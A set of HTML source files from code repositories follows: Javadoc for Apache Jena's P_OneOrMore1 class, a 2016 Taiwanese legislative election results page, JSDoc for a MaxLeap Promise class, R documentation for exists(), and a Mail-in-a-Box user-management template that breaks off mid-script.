class="typeNameLink">Prev&nbsp;Class</span></a></li> <li><a href="../../../../../org/apache/jena/sparql/path/P_OneOrMoreN.html" title="class in org.apache.jena.sparql.path"><span class="typeNameLink">Next&nbsp;Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/apache/jena/sparql/path/P_OneOrMore1.html" target="_top">Frames</a></li> <li><a href="P_OneOrMore1.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">org.apache.jena.sparql.path</div> <h2 title="Class P_OneOrMore1" class="title">Class P_OneOrMore1</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li><a href="http://docs.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true" title="class or interface in java.lang">java.lang.Object</a></li> <li> <ul class="inheritance"> <li><a href="../../../../../org/apache/jena/sparql/path/PathBase.html" title="class in org.apache.jena.sparql.path">org.apache.jena.sparql.path.PathBase</a></li> <li> <ul class="inheritance"> <li><a href="../../../../../org/apache/jena/sparql/path/P_Path1.html" title="class in org.apache.jena.sparql.path">org.apache.jena.sparql.path.P_Path1</a></li> <li> <ul class="inheritance"> <li>org.apache.jena.sparql.path.P_OneOrMore1</li> </ul> </li> </ul> </li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <dl> <dt>All Implemented Interfaces:</dt> <dd><a href="../../../../../org/apache/jena/sparql/path/Path.html" title="interface in org.apache.jena.sparql.path">Path</a></dd> </dl> <hr> <br> <pre>public class <span class="typeNameLabel">P_OneOrMore1</span> extends <a href="../../../../../org/apache/jena/sparql/path/P_Path1.html" title="class in org.apache.jena.sparql.path">P_Path1</a></pre> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor.summary"> <!-- --> </a> <h3>Constructor Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation"> <caption><span>Constructors</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Constructor and Description</th> </tr> <tr class="altColor"> <td class="colOne"><code><span class="memberNameLink"><a href="../../../../../org/apache/jena/sparql/path/P_OneOrMore1.html#P_OneOrMore1-org.apache.jena.sparql.path.Path-">P_OneOrMore1</a></span>(<a href="../../../../../org/apache/jena/sparql/path/Path.html" title="interface in org.apache.jena.sparql.path">Path</a>&nbsp;path)</code>&nbsp;</td> </tr> </table> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method.summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span id="t0" class="activeTableTab"><span>All Methods</span><span class="tabEnd">&nbsp;</span></span><span id="t2" class="tableTab"><span><a href="javascript:show(2);">Instance Methods</a></span><span class="tabEnd">&nbsp;</span></span><span id="t4" class="tableTab"><span><a href="javascript:show(8);">Concrete Methods</a></span><span class="tabEnd">&nbsp;</span></span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr id="i0" class="altColor"> <td class="colFirst"><code>boolean</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../../org/apache/jena/sparql/path/P_OneOrMore1.html#equalTo-org.apache.jena.sparql.path.Path-org.apache.jena.sparql.util.NodeIsomorphismMap-">equalTo</a></span>(<a href="../../../../../org/apache/jena/sparql/path/Path.html" title="interface in org.apache.jena.sparql.path">Path</a>&nbsp;path2, <a href="../../../../../org/apache/jena/sparql/util/NodeIsomorphismMap.html" title="class in org.apache.jena.sparql.util">NodeIsomorphismMap</a>&nbsp;isoMap)</code>&nbsp;</td> </tr> <tr id="i1" class="rowColor"> <td class="colFirst"><code>int</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../../org/apache/jena/sparql/path/P_OneOrMore1.html#hashCode--">hashCode</a></span>()</code>&nbsp;</td> </tr> <tr id="i2" class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../../org/apache/jena/sparql/path/P_OneOrMore1.html#visit-org.apache.jena.sparql.path.PathVisitor-">visit</a></span>(<a href="../../../../../org/apache/jena/sparql/path/PathVisitor.html" title="interface in org.apache.jena.sparql.path">PathVisitor</a>&nbsp;visitor)</code>&nbsp;</td> </tr> </table> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.org.apache.jena.sparql.path.P_Path1"> <!-- --> </a> <h3>Methods inherited from class&nbsp;org.apache.jena.sparql.path.<a href="../../../../../org/apache/jena/sparql/path/P_Path1.html" title="class in org.apache.jena.sparql.path">P_Path1</a></h3> <code><a href="../../../../../org/apache/jena/sparql/path/P_Path1.html#getSubPath--">getSubPath</a></code></li> </ul> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.org.apache.jena.sparql.path.PathBase"> <!-- --> </a> <h3>Methods inherited from class&nbsp;org.apache.jena.sparql.path.<a href="../../../../../org/apache/jena/sparql/path/PathBase.html" title="class in org.apache.jena.sparql.path">PathBase</a></h3> <code><a href="../../../../../org/apache/jena/sparql/path/PathBase.html#equals-java.lang.Object-">equals</a>, <a href="../../../../../org/apache/jena/sparql/path/PathBase.html#toString--">toString</a>, <a href="../../../../../org/apache/jena/sparql/path/PathBase.html#toString-org.apache.jena.sparql.core.Prologue-">toString</a></code></li> </ul> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.<a href="http://docs.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true" title="class or interface in java.lang">Object</a></h3> <code><a href="http://docs.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#getClass--" title="class or interface in java.lang">getClass</a>, <a href="http://docs.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#notify--" title="class or interface in java.lang">notify</a>, <a href="http://docs.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#notifyAll--" title="class or interface in java.lang">notifyAll</a>, <a href="http://docs.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#wait--" title="class or interface in java.lang">wait</a>, <a href="http://docs.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#wait-long-" title="class or interface in java.lang">wait</a>, <a href="http://docs.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#wait-long-int-" title="class or interface in java.lang">wait</a></code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ========= CONSTRUCTOR DETAIL ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor.detail"> <!-- --> </a> <h3>Constructor Detail</h3> <a name="P_OneOrMore1-org.apache.jena.sparql.path.Path-"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>P_OneOrMore1</h4> <pre>public&nbsp;P_OneOrMore1(<a href="../../../../../org/apache/jena/sparql/path/Path.html" title="interface in org.apache.jena.sparql.path">Path</a>&nbsp;path)</pre> </li> </ul> </li> </ul> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method.detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="equalTo-org.apache.jena.sparql.path.Path-org.apache.jena.sparql.util.NodeIsomorphismMap-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>equalTo</h4> <pre>public&nbsp;boolean&nbsp;equalTo(<a href="../../../../../org/apache/jena/sparql/path/Path.html" title="interface in org.apache.jena.sparql.path">Path</a>&nbsp;path2, <a href="../../../../../org/apache/jena/sparql/util/NodeIsomorphismMap.html" title="class in org.apache.jena.sparql.util">NodeIsomorphismMap</a>&nbsp;isoMap)</pre> <dl> <dt><span class="overrideSpecifyLabel">Specified by:</span></dt> <dd><code><a href="../../../../../org/apache/jena/sparql/path/Path.html#equalTo-org.apache.jena.sparql.path.Path-org.apache.jena.sparql.util.NodeIsomorphismMap-">equalTo</a></code>&nbsp;in interface&nbsp;<code><a href="../../../../../org/apache/jena/sparql/path/Path.html" title="interface in org.apache.jena.sparql.path">Path</a></code></dd> <dt><span class="overrideSpecifyLabel">Specified by:</span></dt> <dd><code><a href="../../../../../org/apache/jena/sparql/path/PathBase.html#equalTo-org.apache.jena.sparql.path.Path-org.apache.jena.sparql.util.NodeIsomorphismMap-">equalTo</a></code>&nbsp;in class&nbsp;<code><a href="../../../../../org/apache/jena/sparql/path/PathBase.html" title="class in org.apache.jena.sparql.path">PathBase</a></code></dd> </dl> </li> </ul> <a name="hashCode--"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>hashCode</h4> <pre>public&nbsp;int&nbsp;hashCode()</pre> <dl> <dt><span class="overrideSpecifyLabel">Specified by:</span></dt> <dd><code><a href="../../../../../org/apache/jena/sparql/path/PathBase.html#hashCode--">hashCode</a></code>&nbsp;in class&nbsp;<code><a href="../../../../../org/apache/jena/sparql/path/PathBase.html" title="class in org.apache.jena.sparql.path">PathBase</a></code></dd> </dl> </li> </ul> <a name="visit-org.apache.jena.sparql.path.PathVisitor-"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>visit</h4> <pre>public&nbsp;void&nbsp;visit(<a href="../../../../../org/apache/jena/sparql/path/PathVisitor.html" title="interface in org.apache.jena.sparql.path">PathVisitor</a>&nbsp;visitor)</pre> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/P_OneOrMore1.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../org/apache/jena/sparql/path/P_NegPropSet.html" title="class in org.apache.jena.sparql.path"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li><a href="../../../../../org/apache/jena/sparql/path/P_OneOrMoreN.html" title="class in org.apache.jena.sparql.path"><span class="typeNameLink">Next&nbsp;Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/apache/jena/sparql/path/P_OneOrMore1.html" target="_top">Frames</a></li> <li><a href="P_OneOrMore1.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Licenced under the Apache License, Version 2.0</small></p> </body> </html>
data/nativeflat/n000000000000000/20160116065015/page.html
gugod/vote-watch-2016
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" type="text/css"> <link href="../css/style2.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="../js/ftiens4.js"></script> <script type="text/javascript" src="../js/ua.js"></script> <script type="text/javascript" src="../js/func.js"></script> <script type="text/javascript" src="../js/treeT.js"></script> <script type="text/javascript" src="../js/refresh.js"></script> </head> <body id="main-body"> <div id="main-header"> <div id="main-top"> <a class="main-top-logo" href="#">中央選舉委員會</a> <ul class="main-top-list"> <li class="main-top-item"><a class="main-top-link main-top-link-home" href="../index.html">回首頁</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-cec" href="http://2016.cec.gov.tw">中選會網站</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-english" href="../../en/index.html">English</a></li> </ul> </div> </div> <div id="main-wrap"> <div id="main-banner"> <div class="slideshow"> <img src="../img/main_bg_2.jpg" width="1024" height="300" alt="background" title="background"> </div> <div class="main-deco"></div> <div class="main-title"></div> <a class="main-pvpe" href="../IDX/indexP1.html">總統副總統選舉</a> <a class="main-le main-le-current" href="../IDX/indexT.html">立法委員選舉</a> </div> <div id="main-container"> <div id="main-content"> <table width="1024" border="1" cellpadding="0" cellspacing="0"> <tr> <td width="180" valign="top"> <div id="divMenu"> <table border="0"> <tr> <td><a style="text-decoration:none;color:silver" href="http://www.treemenu.net/" target=_blank></a></td> </tr> </table> <span class="TreeviewSpanArea"> <script>initializeDocument()</script> <noscript>請開啟Javascript功能</noscript> </span> </div> </td> <td width="796" valign="top"> <div id="divContent"> <!-- 修改區塊 --> <table width="100%" border="0" cellpadding="0" cellspacing="4"> <tr> <td><img src="../images/search.png" alt="候選人得票數" title="候選人得票數">&nbsp;<b>平地原住民立法委員選舉&nbsp;候選人得票數&nbsp;</b></td> </tr> <tr valign="bottom"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="bottom"> <td class="fontNumber">&nbsp;<img src="../images/nav.gif" alt="候選人數" title="候選人數">&nbsp;<img src="../images/nav.gif" alt="候選人數" title="候選人數">&nbsp;候選人數:13&nbsp;&nbsp;<img src="../images/nav.gif" alt="應選人數" title="應選人數">&nbsp;<img src="../images/nav.gif" alt="應選人數" title="應選人數">&nbsp;應選人數:3&nbsp; <!-- <img src="../images/nav.gif">&nbsp;<img src="../images/nav.gif" alt="應有婦女當選名額" title="應有婦女當選名額">&nbsp;平地原住民合計應有婦女當選名額:0--></td> <td align="right"> <select name="selector_order" class="selectC" tabindex="1" id="orderBy" onChange="changeOrder();"> <option value="n">依號次排序</option> <option value="s">依得票排序</option> </select> </td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="6" cellspacing="1" class="tableT"> <tr class="trHeaderT"> <td>註記</td> <td>號次</td> <td>姓名</td> <td>性別</td> <td>得票數</td> <td>得票率%</td> <td>推薦之政黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>1</td> <td>達摩.阿雄</td> <td>男</td> <td class="tdAlignRight">0</td> <td class="tdAlignRight">0.0000</td> <td>無</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>2</td> <td>達佶祐‧卡造<br>Takiyo‧Kacaw</td> <td>男</td> <td class="tdAlignRight">0</td> <td class="tdAlignRight">0.0000</td> <td>軍公教聯盟黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>3</td> <td>林昊宜</td> <td>女</td> <td class="tdAlignRight">0</td> <td class="tdAlignRight">0.0000</td> <td>親民黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>4</td> <td>鄭天財<br>Sra.Kacaw</td> <td>男</td> <td class="tdAlignRight">0</td> <td class="tdAlignRight">0.0000</td> <td>中國國民黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>5</td> <td>馬躍‧比吼<br>Mayaw‧Biho</td> <td>男</td> <td class="tdAlignRight">0</td> <td class="tdAlignRight">0.0000</td> <td>無</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>6</td> <td>柯荏耀</td> <td>男</td> <td class="tdAlignRight">0</td> <td class="tdAlignRight">0.0000</td> <td>無</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>7</td> <td>林光義</td> <td>男</td> <td class="tdAlignRight">0</td> <td class="tdAlignRight">0.0000</td> <td>台灣第一民族黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>8</td> <td>吳國譽<br>Rahic Amind</td> <td>男</td> <td class="tdAlignRight">0</td> <td class="tdAlignRight">0.0000</td> <td>民國黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>9</td> <td>林金瑛</td> <td>女</td> <td class="tdAlignRight">0</td> <td class="tdAlignRight">0.0000</td> <td>健保免費連線</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>10</td> <td>林琮翰</td> <td>男</td> <td class="tdAlignRight">0</td> <td class="tdAlignRight">0.0000</td> <td>中國國民黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>11</td> <td>陳瑩</td> <td>女</td> <td class="tdAlignRight">0</td> <td class="tdAlignRight">0.0000</td> <td>民主進步黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>12</td> <td>嘎礌‧武拜‧哈雅萬<br>Galahe‧Wubai‧Hayawan</td> <td>男</td> <td class="tdAlignRight">0</td> <td class="tdAlignRight">0.0000</td> <td>無</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>13</td> <td>廖國棟<br>Sufin.Siluko</td> <td>男</td> <td class="tdAlignRight">0</td> <td class="tdAlignRight">0.0000</td> <td>中國國民黨</td> </tr> <tr class="trFooterT"> <td colspan="7" align="right">投開票所數 已送/應送:&nbsp;0/15582&nbsp;</td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="10"></td> <td valign="top" class="fontNote"> <table> <tr> <td>註記說明:</td> <td align="center">◎</td> <td>當選註記</td> </tr> <tr> <td></td> <td align="center">?</td> <td>同票待抽籤</td> </tr> </table> </td> <td valign="top" class="fontTimer"><img src="../images/clock2.png" alt="Sat, 16 Jan 2016 14:48:09 +0800" title="Sat, 16 Jan 2016 14:48:09 +0800">&nbsp;資料更新時間:01/16&nbsp;14:48:06&nbsp;<br>(網頁每3分鐘自動更新一次)</td> </tr> <tr> <td colspan="3" class="fontNote"></td> </tr> </table> </td> </tr> </table> <!-- 修改區塊 --> </div> </td> </tr> </table> </div> <div class="main-footer"></div> <div id="divFooter">[中央選舉委員會] </div> <!--main-content--> </div><!--main-container--> </div><!--END main-wrap--> <script>setOrder();</script> <script>setMenuScrollPosY();</script> </body> </html>
v2.1.0/module.exports__resolved.html
MaxLeap/API-Reference-Javascript
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>JSDoc: Class: _resolved</title> <script src="scripts/prettify/prettify.js"> </script> <script src="scripts/prettify/lang-css.js"> </script> <!--[if lt IE 9]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css"> <link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css"> </head> <body> <div id="main"> <h1 class="page-title">Class: _resolved</h1> <section> <header> <h2>_resolved</h2> </header> <article> <div class="container-overview"> <h4 class="name" id="_resolved"><span class="type-signature"></span>new _resolved<span class="signature">(fn)</span><span class="type-signature"></span></h4> <div class="description"> A Promise is returned by async methods as a hook to provide callbacks to be called when the async task is fulfilled. <p>Typical usage would be like:<pre> query.find().then(function(results) { results[0].set("foo", "bar"); return results[0].saveAsync(); }).then(function(result) { console.log("Updated " + result.id); }); </pre></p> <p>Another example:<pre> var promise = new ML.Promise(function(resolve, reject) { resolve(42); }); promise.then(function(value){ console.log(value); }).catch(function(error){ console.error(error); }); </pre></p> </div> <h5>Parameters:</h5> <table class="params"> <thead> <tr> <th>Name</th> <th>Type</th> <th class="last">Description</th> </tr> </thead> <tbody> <tr> <td class="name"><code>fn</code></td> <td class="type"> <span class="param-type">function</span> </td> <td class="description last">An optional function with two arguments resolve and reject.The first argument fulfills the promise, the second argument rejects it. We can call these functions, once our operation is completed.</td> </tr> </tbody> </table> <dl class="details"> <dt class="tag-source">Source:</dt> <dd class="tag-source"><ul class="dummy"><li> <a href="promise.js.html">promise.js</a>, <a href="promise.js.html#line34">line 34</a> </li></ul></dd> <dt class="tag-see">See:</dt> <dd class="tag-see"> <ul> <li>ML.Promise.prototype.then</li> </ul> </dd> </dl> </div> </article> </section> </div> <nav> <h2><a href="index.html">Home</a></h2><h3>Classes</h3><ul><li><a href="ML.Analytics.html">Analytics</a></li><li><a href="ML.CloudCode.html">CloudCode</a></li><li><a href="ML.Error.html">Error</a></li><li><a href="ML.File.html">File</a></li><li><a href="ML.GeoPoint.html">GeoPoint</a></li><li><a href="ML.Object.html">Object</a></li><li><a href="ML.Query.html">Query</a></li><li><a href="ML.Relation.html">Relation</a></li><li><a href="ML.User.html">User</a></li><li><a href="module.exports__resolved.html">_resolved</a></li><li><a href="Timeline.html">Timeline</a></li></ul><h3>Namespaces</h3><ul><li><a href="Contains%2520all%2520ML%2520API%2520classes%2520and%2520functions..html">Contains all ML API classes and functions.</a></li></ul><h3>Global</h3><ul><li><a href="global.html#_decode">_decode</a></li><li><a href="global.html#_extend">_extend</a></li><li><a href="global.html#_registerDecoder">_registerDecoder</a></li></ul> </nav> <br class="clear"> <footer> Documentation generated by <a href="https://github.com/jsdoc3/jsdoc">JSDoc 3.4.0</a> on Mon Aug 22 2016 10:08:34 GMT+0800 (CST) </footer> <script> prettyPrint(); </script> <script src="scripts/linenumber.js"> </script> </body> </html>
R-Portable-Win/library/base/html/exists.html
ColumbusCollaboratory/electron-quick-start
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>R: Is an Object Defined?</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="stylesheet" type="text/css" href="R.css" /> </head><body> <table width="100%" summary="page for exists {base}"><tr><td>exists {base}</td><td style="text-align: right;">R Documentation</td></tr></table> <h2>Is an Object Defined?</h2> <h3>Description</h3> <p>Look for an <span style="font-family: Courier New, Courier; color: #666666;"><b>R</b></span> object of the given name and possibly return it </p> <h3>Usage</h3> <pre> exists(x, where = -1, envir = , frame, mode = "any", inherits = TRUE) get0(x, envir = pos.to.env(-1L), mode = "any", inherits = TRUE, ifnotfound = NULL) </pre> <h3>Arguments</h3> <table summary="R argblock"> <tr valign="top"><td><code>x</code></td> <td> <p>a variable name (given as a character string).</p> </td></tr> <tr valign="top"><td><code>where</code></td> <td> <p>where to look for the object (see the details section); if omitted, the function will search as if the name of the object appeared unquoted in an expression.</p> </td></tr> <tr valign="top"><td><code>envir</code></td> <td> <p>an alternative way to specify an environment to look in, but it is usually simpler to just use the <code>where</code> argument.</p> </td></tr> <tr valign="top"><td><code>frame</code></td> <td> <p>a frame in the calling list. Equivalent to giving <code>where</code> as <code>sys.frame(frame)</code>.</p> </td></tr> <tr valign="top"><td><code>mode</code></td> <td> <p>the mode or type of object sought: see the &lsquo;Details&rsquo; section.</p> </td></tr> <tr valign="top"><td><code>inherits</code></td> <td> <p>should the enclosing frames of the environment be searched?</p> </td></tr> <tr valign="top"><td><code>ifnotfound</code></td> <td> <p>the return value of <code>get0(x, *)</code> when <code>x</code> does not exist.</p> </td></tr> </table> <h3>Details</h3> <p>The <code>where</code> argument can specify the environment in which to look for the object in any of several ways: as an integer (the position in the <code><a href="search.html">search</a></code> list); as the character string name of an element in the search list; or as an <code><a href="environment.html">environment</a></code> (including using <code><a href="sys.parent.html">sys.frame</a></code> to access the currently active function calls). The <code>envir</code> argument is an alternative way to specify an environment, but is primarily there for back compatibility. </p> <p>This function looks to see if the name <code>x</code> has a value bound to it in the specified environment. If <code>inherits</code> is <code>TRUE</code> and a value is not found for <code>x</code> in the specified environment, the enclosing frames of the environment are searched until the name <code>x</code> is encountered. See <code><a href="environment.html">environment</a></code> and the &lsquo;R Language Definition&rsquo; manual for details about the structure of environments and their enclosures. </p> <p><b>Warning:</b> <code>inherits = TRUE</code> is the default behaviour for <span style="font-family: Courier New, Courier; color: #666666;"><b>R</b></span> but not for S. </p> <p>If <code>mode</code> is specified then only objects of that type are sought. The <code>mode</code> may specify one of the collections <code>"numeric"</code> and <code>"function"</code> (see <code><a href="mode.html">mode</a></code>): any member of the collection will suffice. (This is true even if a member of a collection is specified, so for example <code>mode = "special"</code> will seek any type of function.) </p> <h3>Value</h3> <p><code>exists():</code> Logical, true if and only if an object of the correct name and mode is found. </p> <p><code>get0():</code> The object&mdash;as from <code><a href="get.html">get</a>(x, *)</code>&mdash; if <code>exists(x, *)</code> is true, otherwise <code>ifnotfound</code>. </p> <h3>Note</h3> <p>With <code>get0()</code>, instead of the easy to read but somewhat inefficient </p> <pre> if (exists(myVarName, envir = myEnvir)) { r &lt;- get(myVarName, envir = myEnvir) ## ... deal with r ... } </pre> <p>you now can use the more efficient (and slightly harder to read) </p> <pre> if (!is.null(r &lt;- get0(myVarName, envir = myEnvir))) { ## ... deal with r ... } </pre> <h3>References</h3> <p>Becker, R. A., Chambers, J. M. and Wilks, A. R. (1988) <em>The New S Language</em>. Wadsworth &amp; Brooks/Cole. </p> <h3>See Also</h3> <p><code><a href="get.html">get</a></code> and <code><a href="../../utils/html/hasName.html">hasName</a></code>. For quite a different kind of &ldquo;existence&rdquo; checking, namely if function arguments were specified, <code><a href="missing.html">missing</a></code>; and for yet a different kind, namely if a file exists, <code><a href="files.html">file.exists</a></code>. </p> <h3>Examples</h3> <pre> ## Define a substitute function if necessary: if(!exists("some.fun", mode = "function")) some.fun &lt;- function(x) { cat("some.fun(x)\n"); x } search() exists("ls", 2) # true even though ls is in pos = 3 exists("ls", 2, inherits = FALSE) # false ## These are true (in most circumstances): identical(ls, get0("ls")) identical(NULL, get0(".foo.bar.")) # default ifnotfound = NULL (!) </pre> <hr /><div style="text-align: center;">[Package <em>base</em> version 3.6.1 <a href="00Index.html">Index</a>]</div> </body></html>
management/templates/users.html
hnk/mailinabox
<h2>Users</h2> <style> #user_table h4 { margin: 1em 0 0 0; } #user_table tr.account_inactive td.address { color: #888; text-decoration: line-through; } #user_table .actions { margin-top: .33em; font-size: 95%; } #user_table .account_inactive .if_active { display: none; } #user_table .account_active .if_inactive { display: none; } #user_table .account_active.if_inactive { display: none; } </style> <h3>Add a mail user</h3> <p>Add an email address to this system. This will create a new login username/password.</p> <form class="form-inline" role="form" onsubmit="return do_add_user(); return false;"> <div class="form-group"> <label class="sr-only" for="adduserEmail">Email address</label> <input type="email" class="form-control" id="adduserEmail" placeholder="Email Address"> </div> <div class="form-group"> <label class="sr-only" for="adduserPassword">Password</label> <input type="password" class="form-control" id="adduserPassword" placeholder="Password"> </div> <div class="form-group"> <select class="form-control" id="adduserPrivs"> <option value="">Normal User</option> <option value="admin">Administrator</option> </select> </div> <button type="submit" class="btn btn-primary">Add User</button> </form> <ul style="margin-top: 1em; padding-left: 1.5em; font-size: 90%;"> <li>Passwords must be at least four characters and may not contain spaces.</li> <li>Use <a href="javascript:show_panel('aliases')">aliases</a> to create email addresses that forward to existing accounts.</li> <li>Administrators get access to this control panel.</li> <li>User accounts cannot contain any international (non-ASCII) characters, but <a href="javascript:show_panel('aliases')">aliases</a> can.</li> </ul> <h3>Existing mail users</h3> <table id="user_table" class="table" style="width: auto"> <thead> <tr> <th width="50%">Email Address</th> <th>Actions</th> <th>Mailbox Size</th> </tr> </thead> <tbody> </tbody> </table> <div style="display: none"> <table> <tr id="user-template"> <td class='address'> </td> <td class='actions'> <span class='privs'> </span> <span class="if_active"> <a href="#" onclick="users_set_password(this); return false;" class='setpw' title="Set Password"> set password </a> | </span> <span class='add-privs'> </span> <a href="#" onclick="users_remove(this); return false;" class='if_active' title="Archive Account"> archive account </a> </td> <td class='mailboxsize'> </td> </tr> <tr id="user-extra-template" class="if_inactive"> <td colspan="3" style="border: 0; padding-top: 0"> <div class='restore_info' style='color: #888; font-size: 90%'>To restore account, create a new account with this email address. Or to permanently delete the mailbox, delete the directory <tt></tt> on the machine.</div> </td> </tr> </table> </div> <script> function show_users() { $('#user_table tbody').html("<tr><td colspan='2' class='text-muted'>Loading...</td></tr>") api( "/mail/users", "GET", { format: 'json' }, function(r) { $('#user_table tbody').html(""); for (var i = 0; i < r.length; i++) { var hdr = $("<tr><td colspan='3'><h4/></td></tr>"); hdr.find('h4').text(r[i].domain); $('#user_table tbody').append(hdr); for (var k = 0; k < r[i].users.length; k++) { var user = 